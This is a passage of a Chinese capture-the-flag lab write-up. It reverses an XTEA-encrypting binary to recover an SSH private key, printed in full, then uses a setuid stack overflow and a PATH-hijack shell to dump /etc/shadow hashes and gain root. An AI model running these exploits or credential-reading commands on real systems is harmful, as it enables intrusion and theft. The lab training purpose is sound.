\/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 mount -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 mountpoint -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 mpstat -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 mv -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 netstat -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 nice -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 pidof -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 ping -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 ping6 -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 pipe_progress -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 printenv -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 ps -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 pwd -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 reformime -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 rev -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 rm -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 rmdir -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 run-parts -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 sed -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 setpriv -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 setserial -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 sh -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 sleep -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 stat -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 stty -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 su -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 sync -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 tar -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 touch -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 true -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 umount -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 uname -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 usleep -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 watch -> \/bin\/busybox\nlrwxrwxrwx    1 root     root            12 May 30  2025 zcat -> \/bin\/busybox\n6ab28be27b0c:\/usr\/bin# ls -la\n-------------\n-rwxr-xr-x    1 root     root          4797 May 26  2025 findssl.sh\n-------------\n-rwxr-xr-x    1 root     root         22344 Mar  5  2025 getconf\n-rwxr-xr-x    1 root     root         18480 Mar  5  2025 getent\n-------------\n-rwxr-xr-x    1 root     root         14152 Mar  5  2025 iconv\n-------------\n-rwxr-xr-x    1 root     root            52 Mar  5  2025 ldd\n-------------\n-rw-r--r--    1 root     root             0 Jun 24  2025 output.enc\n-------------\n-rwxr-xr-x    1 root     root         67504 Jan 20  2025 scanelf\n-rwxr-xr-x    1 root     root        190688 May 26  2025 scp\n-------------\n-rwxr-xr-x    1 root     root        198848 May 26  2025 sftp\n-------------\n-rwxr-xr-x    1 root     root        850752 May 26  2025 ssh\n-rwxr-xr-x    1 root     root        370816 May 26  2025 ssh-add\n-rwxr-xr-x    1 root     root        362656 May 26  2025 ssh-agent\n-rwxr-xr-x    1 root     root         14170 May 26  2025 ssh-copy-id\n-rwxr-xr-x    1 root     root        481576 May 26  2025 ssh-keygen\n-rwxr-xr-x    1 root     root        489992 May 26  2025 ssh-keyscan\n-rwxr-xr-x    1 root     root        338056 May 26  2025 ssh-pkcs11-helper\n-rwxr-xr-x    1 root     root         14384 May 26  2025 ssl_client\n-------------\n-rwxr-xr-x    1 root     root        772016 Jun 24  2025 userLogin\n-------------<\/code><\/pre>\n
\u770b\u5230\u4e86\u4e00\u4e9b\u975ebusybox\u7684\u6587\u4ef6\uff0c\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff0c\u6392\u67e5\u5230\u4e86userLogin<\/code>\uff0c\u4e0b\u8f7d\u4e0b\u6765\u770b\u4e00\u4e0b\uff1a<\/p>\n
# scp -P 2222 root@127.0.0.1:\/usr\/bin\/userLogin .\npwn@ubuntu:~\/temp\/yulian$ file userLogin\nuserLogin: ELF 64-bit LSB executable, x86-64, version 1 (GNU\/Linux), statically linked, BuildID[sha1]=305ce3b4a93ea685f30546b2754e008f7cf0f249, for GNU\/Linux 3.2.0, not stripped\npwn@ubuntu:~\/temp\/yulian$ pwn checksec userLogin\n[*] '\/home\/pwn\/temp\/yulian\/userLogin'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    Stripped:   No<\/code><\/pre>\n
\u53cd\u7f16\u8bd1\u4e00\u4e0b\u770b\u4e00\u4e0b\uff1a<\/p>\n
int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  encrypt_file(argc, argv, envp);\n  return 0;\n}<\/code><\/pre>\n
\u53d1\u73b0\u5b58\u5728\u52a0\u5bc6\uff0c\u770b\u4e00\u4e0b\u52a0\u5bc6\u903b\u8f91\uff1a<\/p>\n
__int64 encrypt_file()\n{\n  int v0; \/\/ ecx\n  int v1; \/\/ r8d\n  int v2; \/\/ r9d\n  __int64 v4; \/\/ [rsp+0h] [rbp-40h] BYREF\n  __int64 v5; \/\/ [rsp+8h] [rbp-38h] BYREF\n  _BYTE v6[24]; \/\/ [rsp+10h] [rbp-30h] BYREF\n  unsigned __int64 v7; \/\/ [rsp+28h] [rbp-18h]\n  __int64 v8; \/\/ [rsp+30h] [rbp-10h]\n  __int64 v9; \/\/ [rsp+38h] [rbp-8h]\n\n  v9 = IO_new_fopen(INPUT_FILE, "rb");\n  v8 = IO_new_fopen(OUTPUT_FILE, "wb");\n  if ( !v9 || !v8 )\n  {\n    perror("error");\n    exit(1);\n  }\n  key_from_fixed_string(v6);\n  while ( 1 )\n  {\n    v7 = IO_fread(&v5, 1, 8, v9);\n    if ( !v7 )\n      break;\n    if ( v7 <= 7 )\n      j_memset(&v6[v7 - 8], 0, 8 - v7);\n    v4 = v5;\n    xtea_encrypt(&v4, v6);\n    IO_fwrite(&v4, 1, 8, v8);\n  }\n  IO_new_fclose(v9);\n  IO_new_fclose(v8);\n  return _printf((unsigned int)&unk_479042, (_DWORD)INPUT_FILE, (_DWORD)OUTPUT_FILE, v0, v1, v2, v4);\n}<\/code><\/pre>\n
\u63a5\u7740\u770b\uff1a<\/p>\n
__int64 __fastcall xtea_encrypt(unsigned int *a1, __int64 a2)\n{\n  int i; \/\/ [rsp+20h] [rbp-10h]\n  unsigned int v4; \/\/ [rsp+24h] [rbp-Ch]\n  unsigned int v5; \/\/ [rsp+28h] [rbp-8h]\n  unsigned int v6; \/\/ [rsp+2Ch] [rbp-4h]\n\n  v6 = *a1;\n  v5 = a1[1];\n  v4 = 0;\n  for ( i = 0; i <= 63; ++i )\n  {\n    v6 += (((v5 >> 5) ^ (16 * v5)) + v5) ^ (*(_DWORD *)(4LL * (v4 & 3) + a2) + v4);\n    v4 -= 1640531527;\n    v5 += (((v6 >> 5) ^ (16 * v6)) + v6) ^ (*(_DWORD *)(4LL * ((v4 >> 11) & 3) + a2) + v4);\n  }\n  *a1 = v6;\n  a1[1] = v5;\n  return v5;\n}<\/code><\/pre>\n
\u8fd9\u4e2a\u7a0b\u5e8f\u5728\u4f7f\u7528v6\u8fdb\u884c\u52a0\u5bc6\u6587\u4ef6\uff0c\u5c1d\u8bd5\u8ffd\u8e2a\u8fdb\u884c\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n
int *__fastcall key_from_fixed_string(__int64 a1)\n{\n  int *result; \/\/ rax\n  int i; \/\/ [rsp+14h] [rbp-4h]\n\n  for ( i = 0; i <= 3; ++i )\n  {\n    result = (int *)(4LL * i + a1);\n    *result = (FIXED_KEY_STR[4 * i + 2] << 16)\n            | (FIXED_KEY_STR[4 * i + 1] << 8)\n            | FIXED_KEY_STR[4 * i]\n            | (FIXED_KEY_STR[4 * i + 3] << 24);\n  }\n  return result;\n}<\/code><\/pre>\n
\"image-20260118154524906\"<\/div><\/p>\n
\u6ce8\u610f\u5230\u4e4b\u524d\u770b\u5230\u8fc7\u4e00\u4e2a\u52a0\u5bc6\u6587\u4ef6\uff0c\u540d\u4e3aoutput.enc<\/code>\uff0c\u4f46\u53ef\u60dc\u5927\u5c0f\u4e3a0\uff0c\u5c1d\u8bd5\u627e\u4e00\u4e0b\u770b\u770b\u6709\u6ca1\u6709\u5176\u4ed6\u52a0\u5bc6\u6587\u4ef6\uff1a<\/p>\n
6ab28be27b0c:\/usr\/bin# find \/ -name "*.enc" -type f 2>\/dev\/null\n\/etc\/output.enc\n\/usr\/bin\/output.enc\n6ab28be27b0c:\/usr\/bin# ls -la \/etc\/output.enc\n-rw-r--r--    1 root     root           400 Jun 24  2025 \/etc\/output.enc<\/code><\/pre>\n
\u5c1d\u8bd5\u4e0b\u8f7d\u4e0b\u6765\u8fdb\u884c\u89e3\u5bc6\uff01\u4ea4\u7ed9\u4e07\u80fd\u7684AI\u59ec\u5427\uff01\u597d\u5427\uff0c\u6211\u7684AI\u59ec\u8fd8\u6ca1\u6709\u8c03\u6559\u597d\uff0c\u76f4\u63a5\u4f7f\u7528pepster<\/code>blog\u4e2d\u7684\u73b0\u6210\u811a\u672c\u4e86\uff0c\u611f\u8c22\uff08\u9634\u6697\u7248\uff09<\/p>\n
#include <stdio.h>\n#include <stdlib.h>\n#include <string.h> \/\/ \u7528\u4e8e memcpy \u548c memset\n\n\/\/ XTEA \u5e38\u91cf\n#define XTEA_DELTA 0x9E3779B9UL \/\/ \u65e0\u7b26\u53f7\u957f\u6574\u578b\uff0c\u786e\u4fdd32\u4f4d\u64cd\u4f5c\n#define NUM_ROUNDS 64           \/\/ XTEA \u7684\u8f6e\u6570\n\n\/\/ \u6ce8\u610f\uff1a\u53ea\u6709\u524d16\u4e2a\u5b57\u8282\u4f1a\u88ab\u7528\u4f5cXTEA\u5bc6\u94a5\nconst char FIXED_KEY_STR[] = "key-for-user-ldzid_ed25519";\n\n\/\/ \u52a0\u5bc6\u540e\u7684\u8f93\u5165\u6587\u4ef6\u548c\u89e3\u5bc6\u540e\u7684\u8f93\u51fa\u6587\u4ef6\u5b8f\u5b9a\u4e49\n#define INPUT_ENCRYPTED_FILE "output.enc"       \/\/ \u8fd9\u662f\u4f60\u5df2\u6709\u7684\u52a0\u5bc6\u6587\u4ef6\n#define OUTPUT_DECRYPTED_FILE "decrypted.bin" \/\/ \u8fd9\u5c06\u662f\u4f60\u7684\u89e3\u5bc6\u540e\u7684\u660e\u6587\u6587\u4ef6\n\n\/\/ \u6839\u636e FIXED_KEY_STR \u751f\u6210 XTEA \u5bc6\u94a5\u7684\u51fd\u6570\n\/\/ \u8fd9\u662f\u5bf9 key_from_fixed_string \u4f2a\u4ee3\u7801\u7684\u76f4\u63a5C\u8bed\u8a00\u5b9e\u73b0\nvoid key_from_fixed_string(unsigned int *key_buffer) {\n    for (int i = 0; i <= 3; ++i) {\n        key_buffer[i] = ((unsigned char)FIXED_KEY_STR[4 * i + 3] << 24) |\n                        ((unsigned char)FIXED_KEY_STR[4 * i + 2] << 16) |\n                        ((unsigned char)FIXED_KEY_STR[4 * i + 1] << 8) |\n                        ((unsigned char)FIXED_KEY_STR[4 * i]);\n    }\n}\n\n\/\/ XTEA \u89e3\u5bc6\u51fd\u6570\uff08XTEA \u52a0\u5bc6\u7b97\u6cd5\u7684\u9006\u64cd\u4f5c\uff09\n\/\/ data_block: \u6307\u54118\u5b57\u8282\u6570\u636e\u5757\u7684\u6307\u9488 (v0, v1)\uff0c\u6570\u636e\u5c06\u88ab\u539f\u5730\u89e3\u5bc6\n\/\/ key: \u6307\u541116\u5b57\u8282\u5bc6\u94a5\u7684\u6307\u9488 (k[0] \u5230 k[3])\nvoid xtea_decrypt(unsigned int *data_block, unsigned int *key) {\n    unsigned int v0 = data_block[0];\n    unsigned int v1 = data_block[1];\n\n    \/\/ sum \u5fc5\u987b\u4ece\u52a0\u5bc6\u7ed3\u675f\u65f6\u7684\u503c\u5f00\u59cb\n    \/\/ \u52a0\u5bc6\u8fc7\u7a0b\uff1asum = 0, \u7136\u540e sum \u7d2f\u52a0 DELTA 64\u6b21\n    \/\/ \u6240\u4ee5\uff0c\u6700\u7ec8\u7684 sum = 64 * DELTA\n    unsigned int sum = XTEA_DELTA * NUM_ROUNDS;\n\n    for (int i = 0; i < NUM_ROUNDS; ++i) {\n        \/\/ 1. \u9006\u5411\u7b2c\u4e8c\u8f6e\u64cd\u4f5c\uff08\u66f4\u65b0 v1\uff09\n        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);\n\n        \/\/ 2. \u9006\u5411 sum \u7684\u53d8\u5316\n        sum -= XTEA_DELTA;\n\n        \/\/ 3. \u9006\u5411\u7b2c\u4e00\u8f6e\u64cd\u4f5c\uff08\u66f4\u65b0 v0\uff09\n        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);\n    }\n\n    data_block[0] = v0;\n    data_block[1] = v1;\n}\n\n\/\/ --- \u6587\u4ef6\u89e3\u5bc6\u8fc7\u7a0b ---\nint decrypt_file() {\n    FILE *fp_in = NULL;\n    FILE *fp_out = NULL;\n    unsigned int xtea_key[4]; \/\/ 4 * 32\u4f4d = 128\u4f4d\u5bc6\u94a5\n    unsigned char block[8];   \/\/ 8\u5b57\u8282\u6570\u636e\u5757\n    size_t bytes_read;\n    long decrypted_bytes_count = 0; \/\/ \u8bb0\u5f55\u5df2\u5199\u5165\u8f93\u51fa\u7684\u5b57\u8282\u6570\n    long encrypted_file_size; \/\/ \u7528\u4e8e\u5224\u65ad\u662f\u5426\u662f\u6700\u540e\u4e00\u4e2a\u5757\n\n    \/\/ 1. \u6253\u5f00\u6587\u4ef6\n    fp_in = fopen(INPUT_ENCRYPTED_FILE, "rb");       \/\/ \u52a0\u5bc6\u540e\u7684\u6587\u4ef6\n    fp_out = fopen(OUTPUT_DECRYPTED_FILE, "wb"); \/\/ \u89e3\u5bc6\u540e\u7684\u6587\u4ef6\n\n    if (!fp_in || !fp_out) {\n        perror("\u6253\u5f00\u6587\u4ef6\u65f6\u51fa\u9519");\n        \/\/ \u5982\u679c\u6587\u4ef6\u6253\u5f00\u5931\u8d25\uff0c\u6253\u5370\u9519\u8bef\u4fe1\u606f\u5e76\u5173\u95ed\u5df2\u6253\u5f00\u7684\u6587\u4ef6\n        if (fp_in) fclose(fp_in);\n        if (fp_out) fclose(fp_out);\n        return 1;\n    }\n\n    \/\/ 2. \u751f\u6210\u5bc6\u94a5\n    key_from_fixed_string(xtea_key);\n    printf("\u4f7f\u7528\u7684 XTEA \u5bc6\u94a5: 0x%08X 0x%08X 0x%08X 0x%08X\\n",\n           xtea_key[0], xtea_key[1], xtea_key[2], xtea_key[3]);\n\n    printf("\u6b63\u5728\u5c06 '%s' \u89e3\u5bc6\u5230 '%s'...\\n", INPUT_ENCRYPTED_FILE, OUTPUT_DECRYPTED_FILE);\n\n    \/\/ \u83b7\u53d6\u52a0\u5bc6\u6587\u4ef6\u603b\u5927\u5c0f\uff0c\u4ee5\u4fbf\u5224\u65ad\u662f\u5426\u662f\u6700\u540e\u4e00\u4e2a\u5757\n    fseek(fp_in, 0, SEEK_END);          \/\/ \u79fb\u52a8\u6587\u4ef6\u6307\u9488\u5230\u6587\u4ef6\u672b\u5c3e\n    encrypted_file_size = ftell(fp_in); \/\/ \u83b7\u53d6\u5f53\u524d\u6587\u4ef6\u6307\u9488\u4f4d\u7f6e\uff08\u5373\u6587\u4ef6\u5927\u5c0f\uff09\n    fseek(fp_in, 0, SEEK_SET);          \/\/ \u79fb\u52a8\u6587\u4ef6\u6307\u9488\u56de\u6587\u4ef6\u5f00\u5934\n\n    \/\/ 3. \u9010\u5757\u89e3\u5bc6\u6587\u4ef6\n    while ((bytes_read = fread(block, 1, 8, fp_in)) > 0) {\n        \/\/ \u5982\u679c\u8bfb\u53d6\u7684\u5b57\u8282\u6570\u5c0f\u4e8e8\uff0c\u8bf4\u660e\u52a0\u5bc6\u6587\u4ef6\u672c\u8eab\u6709\u95ee\u9898\uff08\u672a\u63098\u5b57\u8282\u5757\u5bf9\u9f50\uff09\n        if (bytes_read < 8) {\n            fprintf(stderr, "\u9519\u8bef\uff1a\u52a0\u5bc6\u6587\u4ef6\u4e0d\u662f8\u5b57\u8282\u7684\u500d\u6570\u6216\u5df2\u622a\u65ad\u3002\\n");\n            break; \/\/ \u505c\u6b62\u89e3\u5bc6\n        }\n\n        \/\/ \u89e3\u5bc68\u5b57\u8282\u6570\u636e\u5757\n        \/\/ \u5c06 block \u5f3a\u5236\u8f6c\u6362\u4e3a unsigned int*\uff0cXTEA \u51fd\u6570\u671f\u671b32\u4f4d\u6574\u6570\u6570\u7ec4\n        xtea_decrypt((unsigned int *)block, xtea_key);\n\n        \/\/ --- \u586b\u5145\u53bb\u9664 ---\n\n        size_t bytes_to_write = 8; \/\/ \u9ed8\u8ba4\u5199\u51658\u5b57\u8282\n\n        \/\/ \u68c0\u67e5\u8fd9\u662f\u5426\u662f\u52a0\u5bc6\u6587\u4ef6\u7684\u6700\u540e\u4e00\u4e2a\u5757\n        \/\/ ftell(fp_in) \u8fd4\u56de\u5f53\u524d\u6587\u4ef6\u6307\u9488\u4f4d\u7f6e\uff0c\u5982\u679c\u5b83\u7b49\u4e8e encrypted_file_size\uff0c\u5219\u8868\u793a\u5df2\u7ecf\u8bfb\u53d6\u5230\u6587\u4ef6\u672b\u5c3e\n        if (ftell(fp_in) == encrypted_file_size) {\n            size_t actual_data_len_in_last_block = 8;\n            for (int i = 7; i >= 0; --i) {\n                if (block[i] == 0x00) {\n                    actual_data_len_in_last_block--;\n                } else {\n                    break; \/\/ \u627e\u5230\u975e\u96f6\u5b57\u8282\uff0c\u8fd9\u662f\u539f\u59cb\u6570\u636e\u7684\u7ed3\u5c3e\n                }\n            }\n            bytes_to_write = actual_data_len_in_last_block;\n        }\n\n        \/\/ \u5c06\u89e3\u5bc6\u540e\u7684\u6570\u636e\u5199\u5165\u8f93\u51fa\u6587\u4ef6\n        fwrite(block, 1, bytes_to_write, fp_out);\n        decrypted_bytes_count += bytes_to_write;\n    }\n\n    printf("\u89e3\u5bc6\u5b8c\u6210\u3002\\n");\n    printf("\u5171\u5199\u5165\u89e3\u5bc6\u5b57\u8282\u6570: %ld\\n", decrypted_bytes_count);\n\n    fclose(fp_in);\n    fclose(fp_out);\n    return 0;\n}\n\nint main() {\n    \/\/ \u8fd0\u884c\u89e3\u5bc6\u8fc7\u7a0b\n    \/\/ \u786e\u4fdd\u4f60\u7684 "output.enc" \u6587\u4ef6\u5df2\u5b58\u5728\u4e8e\u7a0b\u5e8f\u8fd0\u884c\u7684\u76ee\u5f55\u4e0b\n    if (decrypt_file() != 0) {\n        return 1;\n    }\n\n    printf("\\n\u89e3\u5bc6\u540e\u7684\u6587\u4ef6\u5df2\u4fdd\u5b58\u4e3a '%s'\\n", OUTPUT_DECRYPTED_FILE);\n    \/\/ \u4f60\u53ef\u4ee5\u624b\u52a8\u68c0\u67e5 'decrypted.bin' \u6587\u4ef6\u5185\u5bb9\u3002\n    \/\/ \u5982\u679c\u539f\u59cb\u6587\u4ef6\u4e0d\u662f\u4ee50\u7ed3\u5c3e\uff0c\u5e76\u4e14\u662f\u7b80\u5355\u7684\u96f6\u586b\u5145\uff0c\u90a3\u4e48\u8fd9\u4e2a\u89e3\u5bc6\u5e94\u8be5\u80fd\u6b63\u5e38\u5de5\u4f5c\u3002\n\n    return 0;\n}<\/code><\/pre>\n
\u4f20\u8bf4\u4e2d\u7684\u524d\u4eba\u683d\u6811\u540e\u4eba\u4e58\u51c9\uff0c\u54c8\u54c8\u54c8\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ vim xtea.c\npwn@ubuntu:~\/temp\/yulian$ gcc xtea.c -o xtea\nxtea.c: In function \u2018xtea_decrypt\u2019:\nxtea.c:6:20: warning: conversion from \u2018long unsigned int\u2019 to \u2018unsigned int\u2019 changes value from \u2018169883889216\u2019 to \u20182380164672\u2019 [-Woverflow]\n    6 | #define XTEA_DELTA 0x9E3779B9UL \/\/ \u65e0\u7b26\u53f7\u957f\u6574\u578b\uff0c\u786e\u4fdd32\u4f4d\u64cd\u4f5c\n      |                    ^~~~~~~~~~~~\nxtea.c:37:24: note: in expansion of macro \u2018XTEA_DELTA\u2019\n   37 |     unsigned int sum = XTEA_DELTA * NUM_ROUNDS;\n      |                        ^~~~~~~~~~\npwn@ubuntu:~\/temp\/yulian$ .\/xtea\n\u4f7f\u7528\u7684 XTEA \u5bc6\u94a5: 0x2D79656B 0x2D726F66 0x72657375 0x7A646C2D\n\u6b63\u5728\u5c06 'output.enc' \u89e3\u5bc6\u5230 'decrypted.bin'...\n\u89e3\u5bc6\u5b8c\u6210\u3002\n\u5171\u5199\u5165\u89e3\u5bc6\u5b57\u8282\u6570: 399\n\n\u89e3\u5bc6\u540e\u7684\u6587\u4ef6\u5df2\u4fdd\u5b58\u4e3a 'decrypted.bin'\npwn@ubuntu:~\/temp\/yulian$ cat decrypted.bin\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW\nQyNTUxOQAAACDG60tqgYFFVx4ClSFGSIVssmKW6ibCoViuF9E8HQayZgAAAJBa9KyZWvSs\nmQAAAAtzc2gtZWQyNTUxOQAAACDG60tqgYFFVx4ClSFGSIVssmKW6ibCoViuF9E8HQayZg\nAAAEDkh1u30NCdjW5cB2TK+hkOBod+D7EKn6vZPHcyHL\/ljMbrS2qBgUVXHgKVIUZIhWyy\nYpbqJsKhWK4X0TwdBrJmAAAADWxkekBsb2NhbGhvc3Q=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n
\u5c1d\u8bd5\u4f7f\u7528\u8be5\u79c1\u94a5\u8fdb\u884c\u8fde\u63a5\uff01\uff01\uff01\uff01<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ chmod 600 decrypted.bin\npwn@ubuntu:~\/temp\/yulian$ ssh-keygen -y -f decrypted.bin\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMbrS2qBgUVXHgKVIUZIhWyyYpbqJsKhWK4X0TwdBrJm ldz@localhost\npwn@ubuntu:~\/temp\/yulian$ ssh ldz@192.168.64.4 -i decrypted.bin<\/code><\/pre>\n
\"image-20260118162746379\"<\/div><\/p>\n
\u6808\u6ea2\u51fa\u63d0\u53d6root\uff01\uff01\uff01\uff01<\/h3>\n
\u9996\u5148\u8fd8\u662f\u8981\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
localhost:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/opt\/vuln\n\/bin\/bbsuid\nlocalhost:~$ file \/opt\/vuln\n\/opt\/vuln: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-musl-x86_64.so.1, BuildID[sha1]=c87268410577b342f9216cff03ec7962d0a9a046, with debug_info, not stripped<\/code><\/pre>\n
\u6f14\u8c46\u4e0d\u6f14\u4e86\uff0c\u4e0b\u8f7d\u5230\u672c\u5730\u770b\u4e00\u4e0b\u5565\u60c5\u51b5\uff1a<\/p>\n
pwn@ubuntu:~\/temp\/yulian$ pwn checksec vuln\n[*] '\/home\/pwn\/temp\/yulian\/vuln'\n    Arch:       amd64-64-little\n    RELRO:      Full RELRO\n    Stack:      No canary found\n    NX:         NX unknown - GNU_STACK missing\n    PIE:        No PIE (0x400000)\n    Stack:      Executable\n    RWX:        Has RWX segments\n    Stripped:   No\n    Debuginfo:  Yes<\/code><\/pre>\n
\u53cd\u7f16\u8bd1\u4e00\u4e0b\uff1a<\/p>\n
int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  setbuf(stdin, 0);\n  setbuf(stdout, 0);\n  setbuf(stderr, 0);\n  vuln();\n  return 0;\n}<\/code><\/pre>\n
void __cdecl vuln()\n{\n  char buffer[32]; \/\/ [rsp+0h] [rbp-30h] BYREF\n  ssize_t n; \/\/ [rsp+20h] [rbp-10h]\n  int flag; \/\/ [rsp+2Ch] [rbp-4h]\n\n  flag = 0;\n  n = read(0, buffer, 0x30u);\n  if ( flag == 1 )\n  {\n    secret();\n  }\n  else\n  {\n    printf("flag = %d\\n", flag);\n    puts("password wrong");\n  }\n}<\/code><\/pre>\n
void __cdecl secret()\n{\n  setuid(0);\n  system("cat \/etc\/shadow");\n}<\/code><\/pre>\n
\u6cea\u725b\u6ee1\u9762\u554a\uff0c\u7ec8\u4e8e\u9047\u5230\u4e00\u4e2a\u4f1a\u7684\u4e86\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6ea2\u51fa\u8986\u76d6flag\u5373\u53ef\uff1a<\/p>\n
  -0000000000000030 \/\/ Use data definition commands to manipulate stack variables and arguments.\n  -0000000000000030 \/\/ Frame size: 30; Saved regs: 8; Purge: 0\n  -0000000000000030\n  -0000000000000030     char buffer[32];\n  -0000000000000010     ssize_t n;\n  -0000000000000008     \/\/ padding byte\n  -0000000000000007     \/\/ padding byte\n  -0000000000000006     \/\/ padding byte\n  -0000000000000005     \/\/ padding byte\n  -0000000000000004     int flag;\n  +0000000000000000     _QWORD __saved_registers;\n  +0000000000000008     _UNKNOWN *__return_address;\n  +0000000000000010\n  +0000000000000010 \/\/ end of stack variables<\/code><\/pre>\n
\u9996\u5148\u7f13\u51b2\u533a\u4e3a32\u5b57\u8282\uff0cread\u53ef\u4ee5\u8bfb\u53d648\u5b57\u8282\uff080x30u\uff09\uff0c\u8f93\u516544\u4e2a\u5b57\u8282\u5373\u53ef\u8986\u76d6flag\uff0c\u770b\u4e0b\u5427\uff1a<\/p>\n
[32 \u5b57\u8282 buffer]\n[8  \u5b57\u8282 n]\n[4  \u5b57\u8282 padding]\n[4  \u5b57\u8282 flag = 1]<\/code><\/pre>\n
\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
localhost:~$ python3 -c 'print("A"*44 + "\\x01\\x00\\x00\\x00")' | \/opt\/vuln\nroot:$6$W5FUwrTeo8vXfNot$qJazigaYSqk8ezVfjHckZb2XjxkrJsniQa5MA1o.j9apE1BMYX5vYuJVEJ2hYbNsR0q9IWOSSt1I40vNYxvKO0:20263:0:::::\nbin:!::0:::::\ndaemon:!::0:::::\nlp:!::0:::::\nsync:!::0:::::\nshutdown:!::0:::::\nhalt:!::0:::::\nmail:!::0:::::\nnews:!::0:::::\nuucp:!::0:::::\ncron:!::0:::::\nftp:!::0:::::\nsshd:!::0:::::\ngames:!::0:::::\nntp:!::0:::::\nguest:!::0:::::\nnobody:!::0:::::\nklogd:!:20205:0:99999:7:::\nchrony:!:20205:0:99999:7:::\nldz:$6$qCU7eP8wj\/Pvo1FB$Ooou6p.TF3M\/kMB29XrzQ6XVNbq7c46lGzNvRPOJ55GAXJ0h.jmbc8VHhGjFgwXLHPSbNt96l\/rmUYgDqpo8Y0:20263:0:99999:7:::\nnginx:!:20263:0:99999:7:::<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u7834\u89e3\u5373\u53ef\uff0c\u6211\u5728\u522b\u7684\u5e08\u5085\u535a\u5ba2\u4e2d\u4e5f\u53d1\u73b0\u53ef\u4ee5\u901a\u8fc7\u52ab\u6301\u547d\u4ee4\u83b7\u53d6flag\uff0c\u8fd9\u79cd\u65b9\u5f0f\u5e94\u8be5\u66f4\u4f18\u96c5\u4e00\u70b9\uff0c\u8bb0\u5f55\u4e00\u4e0b\uff0c\u7b2c\u4e00\u65f6\u95f4\u5c45\u7136\u6ca1\u6709\u60f3\u5230\uff0c\u53ef\u80fd\u662f\u5f88\u957f\u65f6\u95f4\u6ca1\u6253\u9776\u673a\u4e86\uff0c\u563f\u563f\u3002<\/p>\n
echo "\/bin\/sh < \/dev\/pts\/0">cat\nchmod +x cat\nPATH=\/tmp:$PATH\npython3 -c 'print("A"*44 + "\\x01\\x00\\x00\\x00")' | \/opt\/vuln\n\/bin\/cat \/root\/root.txt<\/code><\/pre>\n
\u53c2\u8003<\/h2>\n